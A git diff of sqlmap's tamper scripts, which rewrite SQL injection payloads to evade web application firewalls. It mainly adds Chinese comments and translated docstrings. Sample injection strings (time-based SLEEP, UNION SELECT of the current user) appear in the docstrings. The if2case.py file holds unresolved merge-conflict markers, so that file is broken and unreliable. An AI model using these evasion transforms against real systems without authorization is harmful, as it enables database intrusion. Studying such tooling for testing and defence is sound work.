**kwargs): 'SELECT ABS/**/(1)' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload if payload: + # 使用正则表达式查找单词后紧跟'('的模式,并在'('前添加内联注释'/**/' retVal = re.sub(r"\b(\w+)\(", r"\g<1>/**/(", retVal) return retVal diff --git a/src/sqlmap-master/tamper/concat2concatws.py b/src/sqlmap-master/tamper/concat2concatws.py index 7c66c88..3fbc8d6 100644 --- a/src/sqlmap-master/tamper/concat2concatws.py +++ b/src/sqlmap-master/tamper/concat2concatws.py @@ -5,12 +5,13 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os +import os # 导入操作系统模块,用于获取文件路径等信息 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数 +from lib.core.enums import DBMS # 从核心库导入数据库管理系统枚举 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -18,23 +19,28 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart + 这个函数用于篡改(tamper)输入的payload,将MySQL中的'CONCAT(A, B)'函数替换为其等效的'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'形式。 - Requirement: - * MySQL + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Tested against: + 要求: + * 仅适用于MySQL数据库。 + + 测试情况: * MySQL 5.0 - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the CONCAT() function + 注意: + * 这个篡改方法对于绕过那些过滤CONCAT()函数的非常弱的定制Web应用防火墙很有用。 - >>> tamper('CONCAT(1,2)') - 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' + 示例: + >>> tamper('CONCAT(1,2)') + 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' """ if payload: + # 将payload中的'CONCAT('替换为'CONCAT_WS(MID(CHAR(0),0,0),' payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") return payload diff --git a/src/sqlmap-master/tamper/decentities.py b/src/sqlmap-master/tamper/decentities.py index aaed22f..7457579 100644 --- a/src/sqlmap-master/tamper/decentities.py +++ b/src/sqlmap-master/tamper/decentities.py @@ -5,8 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为低 __priority__ = PRIORITY.LOW def dependencies(): @@ -14,19 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in decimal (using code points) all characters (e.g. ' -> ') + 这个函数用于篡改(tamper)输入的payload,将所有字符转换为HTML实体(使用十进制代码点)。 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + - 遍历payload中的每个字符,并将每个字符转换为其对应的HTML实体形式(例如,' -> ')。 + + 示例: + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload - if payload: - retVal = "" - i = 0 + if payload: # 如果payload不为空 + retVal = "" # 初始化返回值字符串 + i = 0 # 初始化索引 + # 遍历payload中的每个字符 while i < len(payload): + # 将当前字符转换为其对应的HTML实体形式,并添加到返回值字符串 retVal += "&#%s;" % ord(payload[i]) i += 1 diff --git a/src/sqlmap-master/tamper/dunion.py b/src/sqlmap-master/tamper/dunion.py index 2717268..58a4607 100644 --- a/src/sqlmap-master/tamper/dunion.py +++ b/src/sqlmap-master/tamper/dunion.py @@ -5,13 +5,14 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -import os -import re +import os # 导入操作系统模块,用于获取文件路径等信息 +import re # 导入正则表达式模块 -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数 +from lib.core.enums import DBMS # 从核心库导入数据库管理系统枚举 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -19,16 +20,21 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces instances of UNION with DUNION + 这个函数用于篡改(tamper)输入的payload,将其中的'UNION'关键字替换为'DUNION'。 - Requirement: - * Oracle + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Notes: - * Reference: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 要求: + * 仅适用于Oracle数据库。 - >>> tamper('1 UNION ALL SELECT') - '1DUNION ALL SELECT' - """ + 注意: + * 参考文档:https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf + 示例: + >>> tamper('1 UNION ALL SELECT') + '1DUNION ALL SELECT' + """ + # 如果payload不为空,使用正则表达式替换其中的UNION关键字 return re.sub(r"(?i)(\d+)\s+(UNION )", r"\g<1>D\g<2>", payload) if payload else payload diff --git a/src/sqlmap-master/tamper/equaltolike.py b/src/sqlmap-master/tamper/equaltolike.py index ddc237b..6f77ef4 100644 --- a/src/sqlmap-master/tamper/equaltolike.py +++ b/src/sqlmap-master/tamper/equaltolike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,25 +17,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart + 这个函数用于篡改(tamper)输入的payload,将所有的等号('=')操作符替换为'LIKE'操作符。 - Tested against: + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 测试情况: * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 + * MySQL 4, 5.0 和 5.5 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') - * The LIKE operator is SQL standard. Hence, this tamper script - should work against all (?) databases + 注意: + * 这个篡改方法对于绕过那些过滤等号('=')字符的弱Web应用防火墙很有用。 + * LIKE操作符是SQL标准操作符,因此这个tamper脚本应该适用于所有数据库。 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id LIKE 1' + 示例: + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id LIKE 1' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload + - if payload: - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) + if payload: # 如果payload不为空 + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) # 使用正则表达式替换payload中的等号('=')为'LIKE' return retVal diff --git a/src/sqlmap-master/tamper/equaltorlike.py b/src/sqlmap-master/tamper/equaltorlike.py index 097adfc..3e8efb8 100644 --- a/src/sqlmap-master/tamper/equaltorlike.py +++ b/src/sqlmap-master/tamper/equaltorlike.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,22 +17,30 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart + 这个函数用于篡改(tamper)输入的payload,将所有的等号('=')操作符替换为'RLIKE'操作符。 - Tested against: - * MySQL 4, 5.0 and 5.5 + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') + 测试情况: + * MySQL 4, 5.0 和 5.5 - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id RLIKE 1' + 注意: + * 这个篡改方法对于绕过那些过滤等号('=')字符的弱Web应用防火墙很有用。 + + 示例: + >>> tamper('SELECT * FROM users WHERE id=1') + 'SELECT * FROM users WHERE id RLIKE 1' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload if payload: + # 使用正则表达式替换payload中的等号('=')为'RLIKE' + # \s* 匹配任意数量的空白字符(包括0个) + # = 匹配等号字符 + # \s* 匹配等号后的任意数量的空白字符 retVal = re.sub(r"\s*=\s*", " RLIKE ", retVal) return retVal diff --git a/src/sqlmap-master/tamper/escapequotes.py b/src/sqlmap-master/tamper/escapequotes.py index 778b693..f29e8e7 100644 --- a/src/sqlmap-master/tamper/escapequotes.py +++ b/src/sqlmap-master/tamper/escapequotes.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -14,10 +15,19 @@ def dependencies(): def tamper(payload, **kwargs): """ - Slash escape single and double quotes (e.g. ' -> \') + 这个函数用于篡改(tamper)输入的payload,通过斜杠转义单引号和双引号。 - >>> tamper('1" AND SLEEP(5)#') - '1\\\\" AND SLEEP(5)#' - """ + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + - 将payload中的单引号(')替换为转义形式(\\')。 + - 将payload中的双引号(")替换为转义形式(\\")。 + 示例: + >>> tamper('1" AND SLEEP(5)#') + '1\\\\" AND SLEEP(5)#' + """ + # 替换payload中的单引号和双引号为它们的转义形式 return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/src/sqlmap-master/tamper/greatest.py b/src/sqlmap-master/tamper/greatest.py index 5801355..cb9a15b 100644 --- a/src/sqlmap-master/tamper/greatest.py +++ b/src/sqlmap-master/tamper/greatest.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -16,30 +17,36 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces greater than operator ('>') with 'GREATEST' counterpart + 这个函数用于篡改(tamper)输入的payload,将大于操作符('>')替换为'GREATEST'函数的等效形式。 - Tested against: - * MySQL 4, 5.0 and 5.5 + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 测试情况: + * MySQL 4, 5.0 和 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The GREATEST clause is a widespread SQL command. Hence, this - tamper script should work against majority of databases + 注意: + * 这个篡改方法对于绕过那些过滤大于字符('>')的弱Web应用防火墙很有用。 + * GREATEST函数是一个广泛使用的SQL命令。因此,这个tamper脚本应该适用于大多数数据库。 - >>> tamper('1 AND A > B') - '1 AND GREATEST(A,B+1)=A' + 示例: + >>> tamper('1 AND A > B') + '1 AND GREATEST(A,B+1)=A' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload + - if payload: + if payload: # 如果payload不为空 + # 使用正则表达式查找'A > B'形式的语句 match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload) - if match: + if match: # 如果找到匹配项 + # 构造GREATEST函数形式的语句,并替换原语句 _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3)) - retVal = retVal.replace(match.group(0), _) + retVal = retVal.replace(match.group(0), _) # 替换原语句为GREATEST函数形式 return retVal diff --git a/src/sqlmap-master/tamper/halfversionedmorekeywords.py b/src/sqlmap-master/tamper/halfversionedmorekeywords.py index f4dd455..f922076 100644 --- a/src/sqlmap-master/tamper/halfversionedmorekeywords.py +++ b/src/sqlmap-master/tamper/halfversionedmorekeywords.py @@ -8,12 +8,13 @@ See the file 'LICENSE' for copying permission import os import re -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS +from lib.core.common import singleTimeWarnMessage # 从核心库导入单次警告消息函数 +from lib.core.data import kb # 从核心库导入知识库,包含SQL关键字等信息 +from lib.core.enums import DBMS # 从核心库导入数据库管理系统枚举 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS # 从核心设置导入忽略空格影响的关键字列表 +# 设置优先级为较高 __priority__ = PRIORITY.HIGHER def dependencies(): @@ -21,35 +22,44 @@ def dependencies(): def tamper(payload, **kwargs): """ - Adds (MySQL) versioned comment before each keyword + 这个函数用于篡改(tamper)输入的payload,通过在每个关键字前添加MySQL版本注释。 - Requirement: - * MySQL < 5.1 + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Tested against: + 要求: + * 仅适用于MySQL版本小于5.1的数据库。 + + 测试情况: * MySQL 4.0.18, 5.0.22 - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html + 注意: + * 这个篡改方法对于绕过Web应用防火墙很有用,特别是当后端数据库管理系统是MySQL时。 + * 在ModSecurity SQL注入挑战中使用过,链接:http://modsecurity.org/demo/challenge.html - >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") - "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" + 示例: + >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") + "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): + """ + 辅助函数,用于处理正则匹配的结果。 + 将匹配到的关键字替换为带有版本注释的关键字。 + """ word = match.group('word') if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!0%s" % word) else: return match.group() - retVal = payload + retVal = payload # 初始化返回值为输入的payload if payload: + # 使用正则表达式查找并替换关键字 retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", process, retVal) + # 替换多余的空格 retVal = retVal.replace(" /*!0", "/*!0") return retVal diff --git a/src/sqlmap-master/tamper/hex2char.py b/src/sqlmap-master/tamper/hex2char.py index 267124d..fafc134 100644 --- a/src/sqlmap-master/tamper/hex2char.py +++ b/src/sqlmap-master/tamper/hex2char.py @@ -9,11 +9,12 @@ import os import re from lib.core.common import singleTimeWarnMessage -from lib.core.convert import decodeHex -from lib.core.convert import getOrds -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY +from lib.core.convert import decodeHex # 从核心库导入十六进制解码函数 +from lib.core.convert import getOrds # 从核心库导入获取字符ASCII值的函数 +from lib.core.enums import DBMS # 从核心库导入数据库管理系统枚举 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为普通 __priority__ = PRIORITY.NORMAL def dependencies(): @@ -21,29 +22,37 @@ def dependencies(): def tamper(payload, **kwargs): """ - Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),...) counterpart + 这个函数用于篡改(tamper)输入的payload,将每个MySQL的0x编码字符串替换为其等效的CONCAT(CHAR(),...)形式。 - Requirement: - * MySQL + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 - Tested against: - * MySQL 4, 5.0 and 5.5 + 要求: + * 仅适用于MySQL数据库。 - Notes: - * Useful in cases when web application does the upper casing + 测试情况: + * MySQL 4, 5.0 和 5.5 - >>> tamper('SELECT 0xdeadbeef') - 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' + 注意: + * 当Web应用程序执行大写转换时,这个篡改方法很有用。 + + 示例: + >>> tamper('SELECT 0xdeadbeef') + 'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))' """ - retVal = payload + retVal = payload # 初始化返回值为输入的payload - if payload: + if payload: # 如果payload不为空 + # 遍历payload中所有匹配0x模式的字符串 for match in re.finditer(r"\b0x([0-9a-f]+)\b", retVal): - if len(match.group(1)) > 2: + if len(match.group(1)) > 2: # 如果匹配的十六进制字符串长度大于2 + # 将十六进制字符串解码为ASCII值,并构造CONCAT(CHAR(),...)形式的字符串 result = "CONCAT(%s)" % ','.join("CHAR(%d)" % _ for _ in getOrds(decodeHex(match.group(1)))) - else: + else: # 如果长度不超过2,直接构造CHAR()形式的字符串 result = "CHAR(%d)" % ord(decodeHex(match.group(1))) + # 将原0x字符串替换为新构造的字符串 retVal = retVal.replace(match.group(0), result) return retVal diff --git a/src/sqlmap-master/tamper/hexentities.py b/src/sqlmap-master/tamper/hexentities.py index d36923e..2b2c849 100644 --- a/src/sqlmap-master/tamper/hexentities.py +++ b/src/sqlmap-master/tamper/hexentities.py @@ -7,6 +7,7 @@ See the file 'LICENSE' for copying permission from lib.core.enums import PRIORITY +# 设置优先级为低 __priority__ = PRIORITY.LOW def dependencies(): @@ -14,20 +15,29 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode in hexadecimal (using code points) all characters (e.g. ' -> 1) + 这个函数用于篡改(tamper)输入的payload,将所有字符转换为十六进制形式的HTML实体编码(例如,' -> 1)。 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + - 遍历payload中的每个字符,并将每个字符转换为其对应的十六进制HTML实体形式。 + + 示例: + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ retVal = payload if payload: - retVal = "" - i = 0 + retVal = "" # 初始化返回值字符串 + i = 0 # 初始化索引 while i < len(payload): + # 将当前字符转换为其对应的十六进制HTML实体形式,并添加到返回值字符串 retVal += "&#x%s;" % format(ord(payload[i]), "x") - i += 1 + i += 1 # 移动索引,处理下一个字符 return retVal diff --git a/src/sqlmap-master/tamper/htmlencode.py b/src/sqlmap-master/tamper/htmlencode.py index 6cd5507..2a86822 100644 --- a/src/sqlmap-master/tamper/htmlencode.py +++ b/src/sqlmap-master/tamper/htmlencode.py @@ -7,8 +7,9 @@ See the file 'LICENSE' for copying permission import re -from lib.core.enums import PRIORITY +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为低 __priority__ = PRIORITY.LOW def dependencies(): @@ -16,16 +17,26 @@ def dependencies(): def tamper(payload, **kwargs): """ - HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') + 这个函数用于篡改(tamper)输入的payload,将所有非字母数字字符转换为HTML实体编码(使用代码点)。 - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' - >>> tamper("1' AND SLEEP(5)#") - '1' AND SLEEP(5)#' + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 功能: + - 遍历payload中的每个字符,并将非字母数字字符转换为其对应的HTML实体形式。 + + 示例: + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' + >>> tamper("1' AND SLEEP(5)#") + '1' AND SLEEP(5)#' """ - if payload: + if payload: # 如果payload不为空 + # 替换已经编码的HTML实体 payload = re.sub(r"&#(\d+);", lambda match: chr(int(match.group(1))), payload) # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5203 + # 将非字母数字字符转换为HTML实体编码 payload = re.sub(r"[^\w]", lambda match: "&#%d;" % ord(match.group(0)), payload) return payload diff --git a/src/sqlmap-master/tamper/if2case.py b/src/sqlmap-master/tamper/if2case.py index 2e3a01f..2376661 100644 --- a/src/sqlmap-master/tamper/if2case.py +++ b/src/sqlmap-master/tamper/if2case.py @@ -5,67 +5,126 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY -from lib.core.settings import REPLACEMENT_MARKER +<<<<<<< HEAD +from lib.core.compat import xrange # 导入兼容库中的xrange函数,用于兼容Python 2和3的range函数 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +from lib.core.settings import REPLACEMENT_MARKER # 从核心设置导入替换标记 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST +======= +from lib.core.compat import xrange # 用于兼容Python 2和3的range函数 +from lib.core.enums import PRIORITY # 导入优先级枚举 +from lib.core.settings import REPLACEMENT_MARKER # 导入替换标记 + +__priority__ = PRIORITY.HIGHEST # 设置优先级为最高 +>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f def dependencies(): + """此函数用于定义此tamper函数的依赖项。当前实现为空,根据需要可以添加具体的依赖项""" pass def tamper(payload, **kwargs): """ - Replaces instances like 'IF(A, B, C)' with 'CASE WHEN (A) THEN (B) ELSE (C) END' counterpart - - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) - - Tested against: - * MySQL 5.0 and 5.5 - +<<<<<<< HEAD + 这个函数用于篡改(tamper)输入的payload,将'IF(A, B, C)'语句替换为其等效的'CASE WHEN (A) THEN (B) ELSE (C) END'形式。 +======= + 替换IF条件表达式为CASE表达式 +>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f + + 参数: + payload:要篡改的原始payload。 + **kwargs:其他可选参数(在本函数中未使用)。 + + 要求: + * 适用于MySQL、SQLite(可能)和SAP MaxDB(可能)数据库。 + +<<<<<<< HEAD + 测试情况: + * MySQL 5.0 和 5.5 + + 注意: + * 这个篡改方法对于绕过那些过滤IF()函数的非常弱的定制Web应用防火墙很有用。 + + 示例: + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' +======= Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IF() functions + * 适用于绕过非常弱且定制的web应用程序防火墙,该防火墙过滤了IF()函数 - >>> tamper('IF(1, 2, 3)') - 'CASE WHEN (1) THEN (2) ELSE (3) END' - >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') - 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' + Examples: + >>> tamper('IF(1, 2, 3)') + 'CASE WHEN (1) THEN (2) ELSE (3) END' + +>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f + >>> tamper('SELECT IF((1=1), (SELECT "foo"), NULL)') + 'SELECT CASE WHEN (1=1) THEN (SELECT "foo") ELSE (NULL) END' """ - if payload and payload.find("IF") > -1: - payload = payload.replace("()", REPLACEMENT_MARKER) - while payload.find("IF(") > -1: - index = payload.find("IF(") - depth = 1 - commas, end = [], None +<<<<<<< HEAD + if payload and payload.find("IF") > -1: # 如果payload不为空且包含'IF' + payload = payload.replace("()", REPLACEMENT_MARKER) # 替换空括号为替换标记 + while payload.find("IF(") > -1: # 遍历所有'IF'语句 + index = payload.find("IF(") # 找到'IF'的位置 + depth = 1 # 初始化括号深度 + commas, end = [], None # 初始化逗号位置列表和结束位置 + # 遍历payload以找到'IF'语句的结束位置 for i in xrange(index + len("IF("), len(payload)): if depth == 1 and payload[i] == ',': - commas.append(i) + commas.append(i) # 记录逗号位置 elif depth == 1 and payload[i] == ')': - end = i + end = i # 记录结束位置 break elif payload[i] == '(': - depth += 1 + depth += 1 # 增加括号深度 + elif payload[i] == ')': depth -= 1 - + # 如果找到两个逗号且有结束位置,则进行替换 if len(commas) == 2 and end: - a = payload[index + len("IF("):commas[0]].strip("()") - b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") - c = payload[commas[1] + 1:end].lstrip().strip("()") - newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) - payload = payload[:index] + newVal + payload[end + 1:] + a = payload[index + len("IF("):commas[0]].strip("()") # 提取条件A + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 提取结果B + c = payload[commas[1] + 1:end].lstrip().strip("()") # 提取结果C + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 构造新的CASE语句 + payload = payload[:index] + newVal + payload[end + 1:] # 替换原IF语句 + else: + break # 如果不符合条件,则终止循环 + + payload = payload.replace(REPLACEMENT_MARKER, "()") # 恢复替换标记为空括号 +======= + if payload and payload.find("IF") > -1: # 检查payload是否包含IF + payload = payload.replace("()", REPLACEMENT_MARKER) # 替换空的()为REPLACEMENT_MARKER + while payload.find("IF(") > -1: # 检查payload中是否还包含IF( + index = payload.find("IF(") # 找到IF(的位置 + depth = 1 # 初始化深度计数器 + commas, end = [], None # 初始化逗号列表和结束位置 + + for i in xrange(index + len("IF("), len(payload)): # 遍历IF(后的子串 + if depth == 1 and payload[i] == ',': # 如果深度为1且遇到逗号 + commas.append(i) # 记录逗号位置 + elif depth == 1 and payload[i] == ')': # 如果深度为1且遇到右括号 + end = i # 记录结束位置 + break # 结束循环 + elif payload[i] == '(': # 如果遇到左括号 + depth += 1 # 增加深度 + elif payload[i] == ')': # 如果遇到右括号 + depth -= 1 # 减少深度 + + if len(commas) == 2 and end: # 如果有2个逗号并且有结束位置 + a = payload[index + len("IF("):commas[0]].strip("()") # 提取第一个参数 + b = payload[commas[0] + 1:commas[1]].lstrip().strip("()") # 提取第二个参数 + c = payload[commas[1] + 1:end].lstrip().strip("()") # 提取第三个参数 + newVal = "CASE WHEN (%s) THEN (%s) ELSE (%s) END" % (a, b, c) # 构造CASE表达式 + payload = payload[:index] + newVal + payload[end + 1:] # 替换IF()为CASE else: - break + break # 如果不符合条件,跳出循环 - payload = payload.replace(REPLACEMENT_MARKER, "()") + payload = payload.replace(REPLACEMENT_MARKER, "()") # 将REPLACEMENT_MARKER替换回(),防止影响其他部分 +>>>>>>> b2880b499320c050bf54d2910d89b1f5c9c1109f - return payload + return payload \ No newline at end of file diff --git a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py index f439d9d..dd8e6e1 100644 --- a/src/sqlmap-master/tamper/ifnull2casewhenisnull.py +++ b/src/sqlmap-master/tamper/ifnull2casewhenisnull.py @@ -5,9 +5,10 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY +from lib.core.compat import xrange # 导入兼容库中的xrange函数,用于兼容Python 2和3的range函数 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ = PRIORITY.HIGHEST def dependencies(): @@ -33,32 +34,35 @@ def tamper(payload, **kwargs): 'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END' """ - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None + if payload and payload.find("IFNULL") > -1: # 如果payload不为空且包含'IFNULL' + while payload.find("IFNULL(") > -1: # 遍历所有'IFNULL'语句 + index = payload.find("IFNULL(") # 找到'IFNULL'的位置 + depth = 1 # 初始化括号深度 + comma, end = None, None # 初始化逗号位置和结束位置 + # 遍历payload以找到'IFNULL'语句的结束位置 for i in xrange(index + len("IFNULL("), len(payload)): if depth == 1 and payload[i] == ',': - comma = i + comma = i # 记录逗号位置 elif depth == 1 and payload[i] == ')': - end = i + end = i # 记录结束位置 break elif payload[i] == '(': - depth += 1 + depth += 1 # 增加括号深度 + elif payload[i] == ')': - depth -= 1 + depth -= 1 # 减少括号深度 + # 如果找到逗号和结束位置,则进行替换 if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] + _ = payload[index + len("IFNULL("):comma] # 提取参数A + __ = payload[comma + 1:end].lstrip() # 提取参数B + newVal = "CASE WHEN ISNULL(%s) THEN (%s) ELSE (%s) END" % (_, __, _) # 构造新的CASE语句 + payload = payload[:index] + newVal + payload[end + 1:] # 替换原IFNULL语句 else: - break + break # 如果不符合条件,则终止循环 return payload diff --git a/src/sqlmap-master/tamper/ifnull2ifisnull.py b/src/sqlmap-master/tamper/ifnull2ifisnull.py index d182b68..4f1b6ea 100644 --- a/src/sqlmap-master/tamper/ifnull2ifisnull.py +++ b/src/sqlmap-master/tamper/ifnull2ifisnull.py @@ -5,9 +5,9 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) See the file 'LICENSE' for copying permission """ -from lib.core.compat import xrange -from lib.core.enums import PRIORITY - +from lib.core.compat import xrange # 导入兼容库中的xrange函数,用于兼容Python 2和3的range函数 +from lib.core.enums import PRIORITY # 从核心库导入优先级枚举 +# 设置优先级为最高 __priority__ 